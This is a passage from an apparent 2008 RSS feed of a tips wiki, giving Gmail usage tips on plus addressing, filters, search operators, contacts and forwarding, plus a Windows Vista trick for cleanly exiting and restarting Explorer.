Gmail doesn&#39;t offer this feature, but by using some of Gmail&#39;s other features, you can set up a very nice, easy to maintain group of notes...</b><br><b>Here&#39;s what you do:</b><br><b>First, create a Contact with a Name of &quot;Notes&quot; and an Email Address of &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:username+Notes@gmail.com" target="_self"><b>username+Notes@gmail.com</b></a><b>&quot;</b><br><b>Next, create a new Label called &quot;Notes&quot;</b><br><b>Finally, create a Filter to add the &quot;Notes&quot; Label any email addressed to &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:username+Notes@gmail.com" target="_self"><b>username+Notes@gmail.com</b></a><b>&quot;. Also, check the &quot;Skip the Inbox (Archive it)&quot; checkbox.</b><br><b>The effect is this: </b><br><b>When you email yourself from an email account other than your own Gmail account, address the email to &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:username+Notes@gmail.com" target="_self"><b>username+Notes@gmail.com</b></a><b>&quot;. When the message arrives in your Gmail account, it will automatically be archived into your &quot;Notes&quot; Label view, bypassing the Inbox. Nice and organized.</b><br><br><br><h3 align="center">  Gmail Tip #3: The &#39;Plus&#39; Side of Gmail<br><br></h3><b>  <br></b><br><b>Like many Email providers, Gmail supports the standard &quot;plus&quot; addressing scheme. But just what is it, and how can it help me?</b><br><b>The &quot;plus&quot; method of addressing lets you add additional words to your account name (the &quot;left side&quot; of your email address.) For example, if your email address is &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:john.doe@gmail.com" target="_self"><b>john.doe@gmail.com</b></a><b>&quot;, you could add &quot;+club&quot; when you give your email address to members of a club to which you belong. So, your email address would now be &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:john.doe+club@gmail.com" target="_self"><b>john.doe+club@gmail.com</b></a><b>&quot;. But why would you want to do this? Think of the &quot;plus&quot; word as an extra &quot;keyword&quot; or &quot;tag&quot; that you can use to better manage your messages.</b><br><b>Using our example, say you email an invitation to your friends in a club asking them to rsvp to the invitaion. You ask them to reply to &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:john.doe+nope@gtmail.com" target="_self"><b>john.doe+nope@gtmail.com</b></a><b>&quot; when sending you a responseif they don&#39;t want to come, and reply to &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:john.doe+ofcourse@gmail.com" target="_self"><b>john.doe+ofcourse@gmail.com</b></a><b>&quot;. Assuming they follow your directions, You can then set up a Gmail Filters to automatically route emails to specific Labels based on the addresses. It&#39;s a simple example, but the uses can be numerous.</b><br><b>Another use is when you are shopping online. When asked for an email address, use something like &quot;</b><a href="http://rahulhackingarticles.wetpaint.commailto:john.doe+amazon@gmail.com" target="_self"><b>john.doe+amazon@gmail.com</b></a><b>&quot;. That way, whenever you get future emails addressed to that address, you&#39;ll know that it&#39;s either from Amazon directly or from someone to whom they sold your email address. This can be a somewhat effctive way to track spam. Just be aware that not all email systems recognize or accept &quot;plus&quot; addresses. In fact, some spammers even strip it out completely, but it&#39;s a cool tool, none the less. The best way is to just try it and see if it works for your application!</b><br><br><br><h3 align="center">  Gmail Tip #4: What Happens To Sent Messages? <br><br></h3><b>  <br></b><br><b>When you &quot;send&quot; a message, two things happen to it: <br>it gets copied into your &quot;All Mail&quot; view, and <br>it is visible in the &quot;Sent Mail&quot; view. </b><br><b>Many email clients and Webmail services let you optionally delete all sent messages by default, but Gmail doesn&#39;t offer this feature. Here&#39;s why...</b><br><b>One of Gmail&#39;s intentions is to get you out of the &quot;trash everything&quot; mindset. This is one of the reasons why they offer 2GB of storage. </b><br><br><h3 align="center">  Gmail Tip #5: Advanced Search - View Multiple Labels </h3><b>  <br>:</b><br><b>Gmail has some advanced searching capabilities that, if you take the time to learn, enables you drill down to very specific information. </b><br><b>If you want to search for all messages having a specific label, you can click on the &quot;Show search options&quot; link, click the &quot;Search&quot; dropdown, select the desired Lable, and click the &quot;Search Mail&quot; button.</b><br><b>But a shortcut is to type the Label prefixed with the &quot;label:&quot; query word in any simple search field at the top of any Gmail page:</b><br><b>label:Label1</b><br><b>If you want to view all messages that have selected multiple Labels, for example messages having both &#39;Label1&#39; and &#39;Label2&#39;, enter the following into the simple search field at the top of any Gmail page:</b><br><b>label:Label1 label:Label2</b><br><b>To see all messages with either &#39;Label1&#39; or &#39;Label2&#39;, you can enter:</b><br><b>label:Label1 OR label:Label2</b><br><b>Note: the specific label names are NOT case sensitive, but the &quot;OR&quot; operator is case sensitive, and must be in uppercase. The pipe operator &#39;|&#39; can also be used in the same manner as &#39;OR&#39;.</b><br><b>label:Label1 | label:Label2</b><br><br><br><h3 align="center">  Gmail Tip #6: Advanced Search - &#39;Query Words&#39;</h3><br><br><b>One of Gmail&#39;s excellent features is its Search function.Searching can be as simple as entering a keyword or two into the Search field at the top of any page to very complex using Gmail&#39;s advanced &quot;Query Words&quot; to better constrain searches. </b><br><b>Clicking the &quot;Show Search Options&quot; link will open up a pane containing several entry fields and dropdowns. This lets you easily specify more detailed search criteria. For example, say you want to search for all email that is unread, regardless of under what Label it is filed. Simply click the &quot;Search:&quot; dropdown, select &quot;Unread Mail&quot; and click the &quot;Search Mail&quot; button. Gmail will display a list of all unread mesasges. Likewise, you can select specific Labels and you can enter specific terms. It&#39;s very powerful and useful. </b><br><b>Gmail also provides users the ability to prefix their search keywords with &quot;query words&quot; that instruct Gmail how to search. And there is no need to open the Search Options--these can be entered in the simple search window at the top of any page. </b><br><b>For example, say you want to search for messages containing attachments from your family sent before May 21, 2004? You would simply enter the following advanced search criteria: </b><br><b>label:family has:attachment before:2004/5/21</b><br><b>Yes, this could actually be done in the Search Options pane, but in addition to the available search criteria fields, query words not only let you search using criteria not included in the Search Options pane, (like &quot;cc:&quot; and &quot;bcc:&quot;) but you can do &quot;compound&quot; searches otherwise not available in the Search Options pane. For example:</b><br><b>label:doctors label:statements has:attachment before:2004/5/21 in:anywhere</b><br><b>would return all messages with both Labels of &quot;Doctors&quot; and &quot;Statements&quot; containing attachments, sent before May 21, 2004, existing anywhere in my account including the Trash and Spam views.</b><br><b>It&#39;s pretty powerful, and fairly intuitive once you get the hang of it.</b><br><b>For more information, you should check the direct link to Gmail&#39;s &quot;How do I use advanced search?&quot; help page found [here] (You may need to be logged into your Gmail account to access this page.) </b><br><br><br><h3 align="center">  Gmail Tip #7: &#39;Official&#39; Features and Bugs Status Page<br><br></h3><b>  <br></b><br><b>Want to know what features and bugs the Gmail developers are currently working on? Read on to learn how to access Gmail&#39;s new &quot;Features, Fixes, &amp; Feedback&quot; page...</b><br><b>First, log into your Gmail account. You must be logged into your account to access the help screens. Next, click on the &quot;Help&quot; link located at the top of any Gmail page. Next, click on the &quot;Send Feedback&quot; link on the left column. You&#39;ll be taken to a page detailing features Gmail is working on and bugs being squashed!</b><br><br><h3 align="center">  Gmail Tip #8: Cleaning Your Contacts<br><br></h3><b>  <br></b><br><b>One of Gmail&#39;s &quot;features&quot; can leave you with extra entries in your Contacts list. Gmail has a (debatably) nice feature that automatically adds to your Contacts list the email addresses of those to whom you send emails. While this can be helpful at times, just remember that EVERY unique email address you send to gets auto-added. </b><br><b>Log into your Gmail account and click on the &quot;Contacts&quot; link at the top of any Gmail page. A window will open displaying any Contacts you may have. Any you have manually edited will typically have a &quot;Name&quot; and possibly a &quot;Note&quot; associated with it. By default, any Contact Gmail auto-adds and is unedited will not contain any &quot;name&quot; or &quot;note&quot; information, just the email address. Visually scan down the list and look for any that fall into this category. If you find one, determine what to do with it: Delete is, Edit it, or leave it alone. Obviously what you do with it is up to you, </b><br><br><br><h3 align="center">  Gmail Tip #9: New feature! Import Contacts<br><br></h3><b>  <br></b><br><b>For the best explanation of just how to Import Contacts, log into your Gmail account, click on Contacts, and click on the new &quot;Import Contacts&quot; link at the top of the Contacts screen.</b><br><b>But what can you import and how do you import? Gmail will let you import address books into Contacts from Yahoo!, Orkut, Outlook, and pretty much any other service by uploading CSV (Comma Separated Value) files to your Gmail account. You can even manually edit and create CVS files for importing using Microsoft Excel.</b><br><b>Just remember that currently, Gmail&#39;s Contacts fields are limited to just &quot;Name&quot;, &quot;Email Address&quot;, and &quot;Notes&quot;. According to the Help screen, all other fields will be imported into the Notes field.</b><br><br><br><h3 align="center">  Gmail Tip #10: Find Your Unread Messages<br><br></h3><b>  <br></b><br><b>Want a quick and easy way to view all of your &quot;Unread&quot; messages? If you have assigned Labels and archived unread messages, finding them later can sometines be challenging. Simply create a Gmail Label named &quot;Unread&quot;, and you will see all of your unread mail in that folder. Though there are other ways to display unread messages, the nice thing about this method is that it displays the number of unread messages right in the Label list.</b><br><br><br><h3 align="center">  Gmail Tip #11: Creating a Pseudo Address Group!<br><br></h3><b>  <br></b><br><b>Although Gmail doesn&#39;t currently support Groups in your Contacts, you can simulate a Group list by doing the following:<br>Create a new Contact<br>In the &quot;Name&quot; field, enter the name of your Group (eg &quot;My Friends&quot;)<br>In the &quot;E-mail&quot; field, enter your list of email addresses in the following format<br><br><br></b>  <blockquote>  <h3 align="center">  Gmail Tip #14: Improved and New Contacts Features! </h3>  <div align="center">  </div>  <div align="center">  </div></blockquote><b><b>The &quot;Contacts&quot; function has been enhanced to provide some additional functionality, and now adopts the familiar Gmail interface.</b>  <br><b>Gmail now displays a &quot;Contacts&quot; link in the left column under the &quot;standard views&quot; (Inbox, Starred, etc.) and just above the Labels. Clicking on the link brings up a nicely formatted display that matches the style of the rest og GMail. It displays the contact name, email address, Note, and any additional information (see below). At the top are two &quot;tabs&quot; that display &quot;Frequently Mailed&quot; and &quot;All Contacts&quot;. I don&#39;t know what the criteria for &quot;Frequently Mailed&quot; is, but it does contain the most-used contacts.</b><br><b>Here are some new or expanded features: </b><br><b>RECENT CONVERSATIONS<br>Clicking on a contact displays the contact information as well as &quot;Recent Conversations&quot; associated with that contact. Clicking on one of these entries opens it normally with all options available. Very nice.</b><br><b>ADD MORE CONTACT INFO<br>Clicking on &quot;Edit&quot; allows you to update the basic contact information (Names, Email Address, Note). But there&#39;s a new link: &quot;Add More Contact Info&quot; which lets you add additional &quot;Sections&quot; of information. For example, by default there are &quot;Personal&quot; and &quot;Work&quot; sections defined. Each section contains a Section Name field, Two user-selectable &quot;fields&quot; and an &quot;Address&quot; block. Each User Field has a drop-down label containing the following selectable labels: Phone, Mobile, FAX, Pager, Email, IM, Company, Title, Other. You can also add additional fields as needed.</b><br><b>SEARCH CONTACTS<br>Near the top of the Contacts screen is a Search field and a &quot;Search Contacts&quot; button. Entering text into this field and clicking the button returns all contacts that BEGINS WITH the text. This is important to know because it will search ALL contact fields (even the :extended fields) for words beginning with the entered text. For example, entering &quot;Ste&quot; would return &quot;Stephanie&quot;, &quot;Steve&quot;, and &quot;Stewart&quot; but entering &quot;phani&quot; would not return &quot;Stephanie&quot;. Obviously, it would be nice to have extended search capabilities, but this is an excellent start!</b><br><br><br><b>Gmail Tip #14: <br></b><b>Gmail Tip #16: Auto-forward received Gmail!</b> <br><b>Want to use your Gmail account as your main email account but have some or all email auto-forwarded to other email accounts? Well, now you can!</b><br><b>Gmail has added tha ability to forward received emails in two ways: &quot;All&quot; or &quot;Selective&quot;</b><br><b>&quot;ALL&quot; FORWARDING<br>This is a &quot;global&quot; setting that lets you optionally forward all received email to another email address. Click on the &quot;Settings&quot; link, and click on the new &quot;Forwarding&quot; tab. In there, you have the option do Disable or Enable email forwarding. Click on Enable, enter the email address to which you want to forward, and then select one of the following self-explanatory actions from the associated dropdown:<br>-keep Gmail&#39;s copy in the Inbox<br>-archive Gmail&#39;s copy<br>-trash Gmail&#39;s copy</b><br><b>This setting will forward all received email to another email address and take the appropriate action on the received email.</b><br><b>&quot;SELECTIVE&quot; FORWARDING<br>Filters have also been enhanced with a new &quot;Forward it to: emailaddress&quot; action letting you selectivly forward emails based on filter criteria. You can use the same or different email addresss for each filter if you choose providing very powerful email management. For example, I may get statement notifications from a bank and want to auto-copy it to my wife. I just set up a filter to select emails with the bank&#39;s sending email address and then select the &quot;Forward it to:&quot; action and enter my wife&#39;s email address. Now, she&#39;ll get notified also! <br><br></b></b>  <h3 align="center">  Gmail Tip #16: Google Gmail Minibrowser</h3>  <div align="center">  </div>  <div align="center">  </div><b><b>&quot;The Google Deskbar includes a minibrowser that you can use to quickly open your Gmail account in convenient window that automatically hides and can be accessed with a keyboard shortcut. Read on for more information about this tool...   <br>The Google Deskbar is a little Google search tool for Windows taskbar. It can do most of the Google searches using shortcut keys too. (See the link for a picture.) It also include Google&#39;s &quot;Minibrowser&quot; which is fast and cute. If you press Ctrl-Alt-G&mdash;by default, you can turn it off&mdash;you&#39;ll go right to the bar. Typing a search, by default, will open in the mini browser&mdash;again you can turn it off if you want or have it use your default browser (Firefox, etc). </b><br><b>So here&#39;s the tip: Go to Options &gt; Customized Searches &gt; Add. Name it &quot;Gmail&quot; and put in the url: </b><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://gmail.google.com/gmail" rel="nofollow" target="_blank"><b>http://gmail.google.com/gmail</b></a><b>. For the shortcut I used Ctrl M. So if I press Ctrl alt G, then Ctrl M, instant GMail window in the Google Minibrowser! Awesome.</b><br><b>(Google Desktop isn&#39;t included in the default searches either. (Yet!) But you can also add it in the customize dialogue to search your desktop just as easily. Since the minibrowser vanishes automatically it&#39;s tres convenient to find a file!)</b></b><hr size="1"><br/>]]></description></item><item><title>How to Safely Restart Windows Explorer in Vista</title><link>http://rahulhackingarticles.wetpaint.com/page/How+to+Safely+Restart+Windows+Explorer+in+Vista</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/How+to+Safely+Restart+Windows+Explorer+in+Vista</guid><pubDate>Wed, 07 May 2008 13:17:31 CDT</pubDate><description><![CDATA[<br><br>Lets face it, everyone has seen the explorer closing after putting the computer under cryogenics and leaving the user in a state of panic to save the current work. And the only remedy was to close the explorer process using Task Manager, which was not exactly an efficient way to do it because it left one with nothing but the desktop staring at the users face.<br><br> <br><br>Thankfully, Microsoft have admitted (in a shy kind of way) to this and<br>have provided a &ldquo;legal&rdquo; and safe way to close the explorer.<br><br><br><br><br><br>The trick tucked-away in the Start menu of Windows Vista lets you restart Windows Explorer without hastily killing its process and potentially breaking your session.<br><br><br><br><br><br>The Trick<br><ul><li>Open the Start menu. </li><br><li>Hold down the Control and Shift keys, and right-click on a blank space in the Start menu. </li><br><li>Choose &ldquo;Exit Explorer.&rdquo; </li><br><li>Open the Task Manager (Ctrl+Shift+Esc), navigate to File-&gt;Run, enter &ldquo;explorer&rdquo; and hit OK. </li></ul>Why would you ever want to restart Explorer, you might ask? To try out new system modifications, for one, or try and rescue your desktop from crashing. In any case, the Geek&rsquo;s method gives Explorer a chance to properly close down and protect against any strange occurrences down the road.<br><hr size="1"><br/>]]></description></item><item><title>Windows Vista</title><link>http://rahulhackingarticles.wetpaint.com/page/Windows+Vista</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Windows+Vista</guid><pubDate>Wed, 07 May 2008 13:16:46 CDT</pubDate><description><![CDATA[<br>This section deals with the tips n tricks of Windows vista<br><br><hr size="1"><br/>]]></description></item><item><title>Download Articles in .txt</title><link>http://rahulhackingarticles.wetpaint.com/page/Download+Articles+in+.txt</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Download+Article